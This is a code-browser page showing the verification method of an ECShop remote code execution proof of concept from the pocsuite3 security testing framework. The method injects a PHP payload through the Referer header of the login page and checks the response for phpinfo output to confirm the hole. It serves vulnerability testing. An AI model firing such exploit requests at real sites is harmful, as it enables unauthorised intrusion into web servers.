MCPcopy
hub / github.com/knownsec/pocsuite3 / _verify

Method _verify

pocsuite3/pocs/ecshop_rce.py:75–109  ·  view source on GitHub ↗
(self)

Source from the content-addressed store, hash-verified

73 return payload
74
75 def _verify(self):
76 result = {}
77 url = urljoin(self.url, '/user.php?act=login')
78 phpcode = "phpinfo()"
79 flagText = "allow_url_include"
80
81 # ECShop 2.x payload
82 ec2payload = self.gen_ec2payload(phpcode)
83 # ECShop 3.x payload
84 ec3payload = self.gen_ec3payload(phpcode)
85
86 option = self.get_option("app_version")
87
88 if option == "Auto":
89 payloads = [(ec2payload, '2.x'), (ec3payload, '3.x')]
90 elif option == "2.x":
91 payloads = [(ec2payload, '2.x')]
92 elif option == '3.x':
93 payloads = [(ec3payload, '3.x')]
94
95 for payload, version in payloads:
96 headers = {'Referer': payload}
97 try:
98 rr = requests.get(url, headers=headers)
99 if flagText in rr.text:
100 result['VerifyInfo'] = {}
101 result['VerifyInfo']['URL'] = self.url
102 result['VerifyInfo']['Version'] = version
103 break
104 except ReadTimeout:
105 break
106 except Exception as e:
107 pass
108
109 return self.parse_output(result)
110
111 def parse_output(self, result):
112 output = Output(self)

Callers

nothing calls this directly

Calls 4

gen_ec2payloadMethod · 0.95
gen_ec3payloadMethod · 0.95
parse_outputMethod · 0.95
get_optionMethod · 0.80

Tested by

no test coverage detected